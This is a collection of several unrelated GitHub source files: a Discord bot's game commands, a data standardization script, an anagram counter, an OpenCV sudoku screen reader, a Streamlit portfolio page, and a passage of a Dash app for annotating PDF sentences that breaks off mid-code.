","repo_name":"hackatonstimkar/miritam-chelyabinsk","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40180822565","text":"# ----------------------------------------------#\n# hqs.bot © #\n# by phillip.hqs ∫ Thanks to alphaSnosh #\n# ----------------------------------------------#\nfrom discord.ext import commands\nfrom library.icons import links\nfrom library.cog_text import about_text as wm\nfrom library.error_embeds import embeds\nfrom library.cog_info import colors, dice\nimport setup as botsetup\nimport discord\nimport asyncio\nimport random\n\n\nclass Games(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def ssp(self, ctx, args):\n ssp_choice = ['scissor', 'stone', 'paper']\n choice = random.choice(ssp_choice)\n icon = links.ssp\n\n if choice == 'scissor' and args == 'scissor':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'stone':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'paper':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'stone' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'stone':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'paper':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'paper' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'stone':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'paper':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n\n elif choice == 'scissor' and args == 'scissor':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'scissor':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'stone':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'stone':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'stone':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'paper':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'stone' and args == 'paper':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'paper' and args == 'paper':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n else:\n n = discord.Embed(title='Dont try to cheat', color=colors.red)\n n.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=n)\n\n @commands.command()\n async def minesweeper(self, ctx):\n field00 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field01 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field02 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field03 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field04 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field05 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field06 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field07 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field08 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field10 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field11 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field12 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field13 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field14 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field15 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field16 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field17 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field18 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field20 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field21 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field22 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field23 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field24 = random.choice(['1️⃣', '2️⃣', '3️���', '💥'])\n field25 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field26 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field27 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field28 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field30 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field31 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field32 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field33 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field34 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field35 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field36 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field37 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field38 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field40 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field41 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field42 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field43 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field44 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field45 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field46 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field47 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field48 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field50 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field51 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field52 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field53 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field54 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field55 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field56 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field57 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field58 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field60 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field61 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field62 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field63 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field64 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field65 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field66 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field67 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field68 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field70 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field71 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field72 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field73 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field74 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field75 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field76 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field77 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field78 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field80 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field81 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field82 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field83 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field84 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field85 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field86 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field87 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field88 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n minesweeper = f\"\"\"\n || {field00} || || {field10} || || {field20} || || {field30} || || {field40} || || {field50} || || {field60} || || {field70} || || {field80} ||\n || {field01} || || {field11} || || {field21} || || {field31} || || {field41} || || {field51} || || {field61} || || {field71} || || {field81} ||\n || {field02} || || {field12} || || {field22} || || {field32} || || {field42} || || {field52} || || {field62} || || {field72} || || {field82} ||\n || {field03} || || {field13} || || {field23} || || {field33} || || {field43} || || {field53} || || {field63} || || {field73} || || {field83} ||\n || {field04} || || {field14} || || {field24} || || {field34} || || {field44} || || {field54} || || {field64} || || {field74} || || {field84} ||\n || {field05} || || {field15} || || {field25} || || {field35} || || {field45} || || {field55} || || {field65} || || {field75} || || {field85} ||\n || {field06} || || {field16} || || {field26} || || {field36} || || {field46} || || {field56} || || {field66} || || {field76} || || {field86} ||\n || {field07} || || {field17} || || {field27} || || {field37} || || {field47} || || {field57} || || {field67} || || {field77} || || {field87} ||\n || {field08} || || {field18} || || {field28} || || {field38} || || {field48} || || {field58} || || {field68} || || {field78} || || {field88} ||\n \"\"\"\n m = discord.Embed(color=colors.fun, description=minesweeper)\n m.set_author(name='Minesweeper', url=botsetup.website, icon_url=links.minesweeper)\n m.set_footer(text=wm.footer)\n await ctx.send(embed=m)\n\n @commands.command()\n async def rolldice(self, ctx):\n dice_ = [f'{dice.dice_1}',\n f'{dice.dice_2}',\n f'{dice.dice_3}',\n f'{dice.dice_4}',\n f'{dice.dice_5}',\n f'{dice.dice_6}']\n\n rolldice = discord.Embed(description=f'You rolled a {random.choice(dice_)}',\n color=colors.fun)\n rolldice.set_author(name='Roll a dice', url=botsetup.website, icon_url=links.giveaway_fun)\n rolldice.set_footer(text=wm.footer)\n await ctx.send(embed=rolldice)\n\n @commands.command(pass_context=True)\n async def coinflip(self, ctx):\n flip = random.choice([\n f'https://upload.wikimedia.org/wikipedia/de/thumb/8/80/2_euro_coin_Eu_serie_1.png/220px-2_euro_coin_Eu_serie_1.png',\n f'https://www.zwei-euro.com/wp-content/uploads/2019/02/DE-2002.gif'])\n flipcoin = discord.Embed()\n flipcoin.colour = 0x12423\n flipcoin.set_thumbnail(\n url=\"https://media1.tenor.com/images/938e1fc4fcf2e136855fd0e83b1e8a5f/tenor.gif?itemid=5017733\")\n flipcoin1 = await ctx.send(embed=flipcoin)\n coin = discord.Embed()\n coin.set_thumbnail(url=f'{flip}')\n await asyncio.sleep(2)\n await flipcoin1.delete()\n await ctx.send(embed=coin)\n\n @commands.command()\n async def tournament(self, ctx, tc1: discord.Member, tc2: discord.Member, tc3: discord.Member, tc4: discord.Member):\n try:\n user = [tc1, tc2, tc3, tc4]\n hitu1 = f'{tc1} choose a card!'\n hitu2 = f'{tc2} choose a card!'\n hitu3 = f'{tc3} choose a card!'\n hitu4 = f'{tc4} choose a card!'\n rndmc = ['https://i.pinimg.com/originals/9b/bb/70/9bbb7015af1bcd420ee07d89048cebf7.jpg',\n 'https://pics.me.me/thumb_earth-angry-german-kid-spellcastor-tuner-he-rages-about-lag-and-52634494.png',\n 'https://www.memesmonkey.com/images/memesmonkey/cb/cbc69b7a454ec9f50fa0616ca3d4d4d9.jpeg',\n 'https://i.imgur.com/gq8aDzq.jpg',\n 'https://i.redd.it/gqse7u1cudw31.png',\n 'https://i.imgur.com/yeD5fGI.gif',\n 'https://images-na.ssl-images-amazon.com/images/I/51jxIccbroL._AC_.jpg',\n 'https://images-cdn.9gag.com/photo/aDzZ1LO_460s.jpg']\n\n fight = discord.Embed(description=f'{tc1} vs. {tc2} vs. {tc3} vs. {tc4}')\n fight.set_author(name='Battle', icon_url=links.battle, url=botsetup.website)\n fight.set_thumbnail(url='https://media3.giphy.com/media/dw5SDFsmqFhYs/giphy.gif')\n fight.set_footer(text=wm.footer)\n fight1 = await ctx.send(embed=fight)\n\n hit = discord.Embed(title=hitu1, color=colors.fun)\n hit.set_image(url=random.choice(rndmc))\n hit_ = await ctx.send(embed=hit)\n await asyncio.sleep(7)\n\n hit2 = discord.Embed(title=hitu2, color=colors.fun)\n hit2.set_image(url=random.choice(rndmc))\n hit2_ = await ctx.send(embed=hit2)\n await asyncio.sleep(7)\n\n hit3 = discord.Embed(title=hitu3, color=colors.fun)\n hit3.set_image(url=random.choice(rndmc))\n hit3_ = await ctx.send(embed=hit3)\n await asyncio.sleep(7)\n\n hit4 = discord.Embed(title=hitu4, color=colors.fun)\n hit4.set_image(url=random.choice(rndmc))\n hit4_ = await ctx.send(embed=hit4)\n await asyncio.sleep(7)\n\n hit5 = discord.Embed(title=hitu1, color=colors.fun)\n hit5.set_image(url=random.choice(rndmc))\n hit5_ = await ctx.send(embed=hit5)\n await asyncio.sleep(7)\n\n hit6 = discord.Embed(title=hitu2, color=colors.fun)\n hit6.set_image(url=random.choice(rndmc))\n hit6_ = await ctx.send(embed=hit6)\n await asyncio.sleep(7)\n\n hit7 = discord.Embed(title=hitu3, color=colors.fun)\n hit7.set_image(url=random.choice(rndmc))\n hit7_ = await ctx.send(embed=hit7)\n await asyncio.sleep(7)\n\n hit8 = discord.Embed(title=hitu4, color=colors.fun)\n hit8.set_image(url=random.choice(rndmc))\n hit8_ = await ctx.send(embed=hit8)\n await asyncio.sleep(7)\n\n hit9 = discord.Embed(title=hitu2, color=colors.fun)\n hit9.set_image(url=random.choice(rndmc))\n hit9_ = await ctx.send(embed=hit9)\n await asyncio.sleep(7)\n\n hit10 = discord.Embed(title=hitu1, color=colors.fun)\n hit10.set_image(url=random.choice(rndmc))\n hit10_ = await ctx.send(embed=hit10)\n await asyncio.sleep(7)\n\n hit11 = discord.Embed(title=hitu2, color=colors.fun)\n hit11.set_image(url=random.choice(rndmc))\n hit11_ = await ctx.send(embed=hit11)\n await asyncio.sleep(7)\n\n hit12 = discord.Embed(title=hitu1, color=colors.fun)\n hit12.set_image(url=random.choice(rndmc))\n hit12_ = await ctx.send(embed=hit12)\n await asyncio.sleep(7)\n\n await fight1.delete()\n await hit_.delete()\n await hit2_.delete()\n await hit3_.delete()\n await hit4_.delete()\n await hit5_.delete()\n await hit6_.delete()\n await hit7_.delete()\n await hit8_.delete()\n await hit9_.delete()\n await hit10_.delete()\n await hit12_.delete()\n winner = discord.Embed(title=f'{random.choice(user)} WINS!!!\\n', description=f'{tc1}'\n f' VS. '\n f'{tc2}'\n f'explore more commands with /help',\n color=colors.red)\n winner.set_thumbnail(\n url='https://cdna.artstation.com/p/assets/images/images/015/814/178/original/jean-baptiste-gabert-pokemonmockup.gif?1549763590')\n winner.set_footer(text=wm.footer)\n await ctx.send(embed=winner)\n\n except:\n error = discord.Embed(title='Cant find any user', description='User ```<@user>``')\n await ctx.send(embed=error)\n\ndef setup(bot):\n bot.add_cog(Games(bot))\n","repo_name":"philliphqs/hqs.bot","sub_path":"hqs.bot-rewrite/cogs/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":20280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"16473992383","text":"from matplotlib import pyplot as plt\nfrom matplotlib import cm as cm\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport math\n\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\n\ndef standardize_csv_data(input_file_path, output_file_path, begin_column_num, end_column_num, has_header = None, index = None, scaler_path=None):\n no = end_column_num - begin_column_num\n df = pd.read_csv(input_file_path, index_col=False, header = None, names = [i for i in range(no)])\n df = df[df.columns[begin_column_num:end_column_num]].values\n standard_df = standardize_dataset(df, scaler_path)\n #standard_df.columns = df.columns\n #standard_df.reset_index(df.index.values)\n pd.DataFrame(standard_df).to_csv(output_file_path)\n\n\ndef standardize_dataset(dataset, scaler_path=None, standardization_scaler_function = preprocessing.StandardScaler()):\n scaler = standardization_scaler_function.fit(dataset)\n\n # store the standard scaler into scaler_path\n if scaler_path is not None:\n joblib.dump(scaler, scaler_path)\n \n scaled_data = scaler.transform(dataset)\n\n if type(dataset) == pd.DataFrame:\n scaled_data = pd.DataFrame(scaled_data, index=dataset.index, columns=dataset.columns)\n\n return scaled_data\n\nif __name__ == '__main__':\n df = pd.read_csv('../resource/sonar.all-data.csv', index_col=False,\n header = None, names = [i for i in range(61)])\n standardize_csv_data('../resource/sonar.all-data.csv', '../resource/sonar.all-data_standardized.csv', 0, 60)\n\n df = pd.read_csv('../resource/sonar.all-data.csv', index_col=False,\n header = None, names = [i for i in range(61)])\n dataset = df.loc[:, 0:59]\n dataset1 = standardize_dataset(dataset, './filename.pkl')\n scaler = joblib.load('./filename.pkl')\n dataset2 = pd.DataFrame(scaler.transform(dataset) , index=dataset.index, columns=dataset.columns)\n\n print(dataset1.equals(dataset2))\n","repo_name":"yingjieduan/utility","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39226184605","text":"import sys\r\nimport math\r\n\r\nfor line in sys.stdin:\r\n a=line.strip()\r\n freq={}\r\n for i in a:\r\n if i not in freq:\r\n freq[i]=0\r\n freq[i]+=1\r\n\r\n ans = math.factorial(len(a))\r\n\r\n for i in freq:\r\n #print(i)\r\n ans = ans // math.factorial(freq[i])\r\n\r\n print(int(ans))\r\n","repo_name":"Matistjati/Competitive-programming-solutions","sub_path":"open/anagramcounting.py","file_name":"anagramcounting.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6026941602","text":"\nimport argparse\nfrom imutils import contours\nimport imutils\nimport cv2\nimport itertools\nimport numpy as np\nimport pyautogui, time\n\nclass SudokuDetection:\n\n def __init__(self):\n \n #set up reference font for the numbers. \n #For some fonts, it might be necessary to change this reference\n ref = cv2.imread(\"pictures/reference_smartgames.jpg\")\n ref = cv2.cvtColor(ref, cv2.COLOR_BGR2GRAY)\n ref = cv2.threshold(ref, 180, 255, cv2.THRESH_BINARY)[1]\n ref = cv2.bitwise_not(ref)\n \n ref_cnts = cv2.findContours(ref.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n ref_cnts = imutils.grab_contours(ref_cnts)\n ref_cnts = contours.sort_contours(ref_cnts, method='left-to-right')[0]\n \n self.digits = {}\n for i,c in enumerate(ref_cnts):\n x,y,w,h = cv2.boundingRect(c)\n roi = ref[y:y+h, x:x+w]\n roi_resized = cv2.resize(roi,(57,88))\n self.digits[i] = roi_resized\n \n def get_puzzle_from_screen(self):\n \n screen = pyautogui.screenshot()\n screen_array = np.array(screen) \n screen = screen_array[:, :, ::-1].copy()\n \n # pre-process the image by resizing it, converting it to\n # graycale, blurring it, and computing an edge map\t\t\n gray = cv2.cvtColor(screen, cv2.COLOR_BGR2GRAY)\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(blurred, 50, 200, 255)\t\t\n \n cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)\n displayCnt = None\n x,y,w,h = 0,0,0,0\n \n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n x,y,w,h = cv2.boundingRect(c)\n \n #assume the puzzle is the largest square\n if .9 * w < h < 1.1 * w:\n displayCnt = approx\n break\n\n pad_h = int(h / 9 / 30) \n pad_w = int(h / 9/ 30)\n puzzle = None \n puzzle = screen[y:y+h-pad_h, x+pad_w:x+w]\n \n return (self.process_puzzle(puzzle), x,y,w,h)\n \n \n\n def get_puzzle_from_file(self, file):\n\n image = cv2.imread(file)\n return self.process_puzzle(image)\n \n def process_puzzle(self, image):\n \n puzzle = [[0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0]]\n\n height, width = image.shape[:2]\n box_height = int(height / 9.0)\n box_width = int(width / 9.0)\n trim_height = int(box_height / 7)\n trim_width = int(box_width / 7)\n \n for i in range(9):\t\t\n for j in range(9): \n box = image[box_width*i+trim_width:box_width*(i+1)-trim_width,box_height*j+\\\n trim_height:box_height*(j+1)-trim_height].copy()\n puzzle[i][j] = self.get_digit(box)\n\n return puzzle\n\n\n def get_digit(self, image):\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.threshold(image, 180, 255, cv2.THRESH_BINARY)[1]\n image = cv2.bitwise_not(image)\n \n cnts = cv2.findContours(image.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n if len(cnts) > 0:\n cnts = contours.sort_contours(cnts, method='left-to-right')[0]\n \n d = 0\n for i,c in enumerate(cnts):\n x,y,w,h = cv2.boundingRect(c)\n \n digit = image[y:y+h, x:x+w]\n digit_resized = cv2.resize(digit,(57,88))\n \n scores = []\n \n #find the digit with the closest match\n for (digit, digitROI) in self.digits.items():\n result = cv2.matchTemplate(digit_resized, digitROI, cv2.TM_CCOEFF)\n (_,score,_,_) = cv2.minMaxLoc(result)\n scores.append(score)\n d = np.argmax(scores) + 1\n\n return d\n \n def print_sudoku(self, puzzle):\n for i in range(9):\n print(puzzle[i])","repo_name":"crwhite14/sudoku","sub_path":"sudoku_detection.py","file_name":"sudoku_detection.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26342938086","text":"\r\n\r\n# importing streamlit\r\nimport requests\r\nimport streamlit as st\r\nfrom streamlit_lottie import st_lottie\r\n# load assets\r\n\r\n\r\ndef load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n\r\n\r\nlottie_coding = load_lottieurl(\r\n \"https://assets3.lottiefiles.com/packages/lf20_glp2wakj.json\")\r\n\r\n\r\n# title of the page web\r\n\r\nst.set_page_config(page_title='MY PORTFOLIO', page_icon=':tada', layout='wide')\r\nst.title('HELLO, MY NAME IS :wave:')\r\nst.title('Safa Idam hamed:')\r\nst.title('A Front-end developer from Morocco:woman:')\r\nst.write('HI,sranger!:smile:,i am safa i am passionate about digital products that help people experience everyday life, :computer:not endure it.')\r\nst.write(':point_down:')\r\nst.write('[find my github here](https://github.com/SAFAIDAM):link:')\r\nst.write('---')\r\n\r\n# my description\r\nst.title('WHAT I DO:bulb:')\r\nst.write('##')\r\nst.write(\r\n \"\"\" \r\n From understanding your requirements, designing a\r\n blueprint and delivering the final product, I do \r\n everything that falls in between these lines. \"\"\")\r\nst.header('WEB DEVELOPMENT')\r\nst.write(\"If you are lookig for developer who'll take over the research and \")\r\nst.write(\r\n \"development of your website, I am a well-established professional to help you with this\"\r\n)\r\nst.header('UI/UX DESIGN')\r\nst.write(\"An effective UI/UX is what captures attention and spreads a clear message.\")\r\nst.write(\"I make sure the design is innovative and neat with all of this.\")\r\n\r\nst.write('---')\r\n\r\n\r\n# defining skills\r\nst.title(\"SKILLS\")\r\nst.header('html 90%')\r\nst.header('css 90%')\r\nst.header('js 10%')\r\nst.header('python 20%')\r\nst.header('illustrator 95%')\r\nst.header('photoshop 80%')\r\n\r\nst.write('---')\r\n\r\n# contact form\r\n\r\nst.write('contact me here :wave:')\r\nst.write('idamhamedsafa@gmail.com')\r\n","repo_name":"SAFAIDAM/PORTFOLIO-streamlit","sub_path":"streamlit/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7636024283","text":"import dash\nfrom flask import Flask\nfrom dash import Dash, html, dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State, ALL, MATCH\nimport pdftotext as pt\nfrom io import BytesIO\nimport base64\nfrom nltk.tokenize import PunktSentenceTokenizer\nimport json\nimport pandas as pd\n\n# server = Flask(__name__)\napp = Dash(\n __name__,\n external_stylesheets = [dbc.themes.BOOTSTRAP],\n # server = server\n)\napp.title = \"QuOTeS GT\"\nserver = app.server\n\n###################################\n# Upload tab\n###################################\n\nfilename_table = html.Table(\n html.Tr(\n [\n html.Td(dbc.Button(dcc.Upload(children = \"Upload\", id = \"upload\"))),\n html.Td(html.Div(id = \"filename\")),\n html.Td(dbc.Button(\"Process Paper\", id = \"process\"))\n ]\n )\n)\n\ntab_upload = dbc.Tab(\n label = \"Upload\",\n children = [\n filename_table,\n html.P(),\n html.Div(id = \"paper_data\")\n ]\n)\n\n###################################\n# Highlights tab\n###################################\n\ntab_highlights = dbc.Tab(\n label = \"Highlights\",\n children = [\n dbc.Card(\n [\n html.H3(\"Query\"),\n dbc.Textarea(id = \"query\", rows = 5),\n ],\n style = {\"position\":\"sticky\", \"top\":0}\n ),\n html.Div(\n [\n html.H3(\"Sentences\"),\n html.Div(id = \"highlights_table\", \n )\n ],\n )\n ],\n)\n\n###################################\n# Summary tab\n###################################\n\ntab_summary = dbc.Tab(\n label = \"Summary\",\n children = [\n dbc.Row(\n [\n dbc.Col(html.H3(\"Query\")),\n dbc.Col(),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .txt\", \n id = \"download_txt_button\"\n )\n ), \n width = 3\n ),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .csv\", \n id = \"download_csv_button\"\n )\n ), \n width = 3\n ),\n dbc.Col(\n dbc.Card(\n dbc.Button(\n \"Download .json\", \n id = \"download_json_button\"\n )\n ), \n width = 3\n ),\n ]\n ),\n html.P(id = \"summary_query\"),\n html.H3(\"Selected Sentences\"),\n html.Div(id = \"accepted_sentences\")\n ]\n)\n\n###################################\n# Main Container\n###################################\n\napp.layout = dbc.Container(\n [\n dcc.Store(id = \"sentences\"),\n dcc.Store(id = \"relevant\"),\n dcc.Download(id = \"download_txt\"),\n dcc.Download(id = \"download_csv\"),\n dcc.Download(id = \"download_json\"),\n html.H1(\"QuOTeS Ground Truth\"),\n dbc.Tabs([tab_upload, tab_highlights, tab_summary])\n ],\n fluid = True\n)\n\n###################################\n# Callbacks\n###################################\n\n@app.callback(\n Output(\"summary_query\", \"children\"),\n Input(\"query\", \"value\")\n)\ndef update_summary_query(query):\n return query\n\n@app.callback(\n Output(\"filename\", \"children\"),\n Input(\"upload\", \"filename\")\n)\ndef update_filename(filename):\n return f\"filename: {filename}\" \n\n@app.callback(\n Output(\"sentences\", \"data\"),\n Output(\"query\", \"value\"),\n Input(\"process\", \"n_clicks\"),\n State(\"upload\", \"contents\"),\n State(\"upload\", \"filename\")\n)\ndef upload(clicks, contents, filename):\n if contents:\n content_type, content_string = contents.split(',')\n decoded = base64.b64decode(content_string)\n file = BytesIO(decoded)\n if filename.split(\".\")[-1] == \"pdf\":\n pdf = pt.PDF(file, raw = True)\n document = \"\".join(pdf).replace(\"-\\n\", 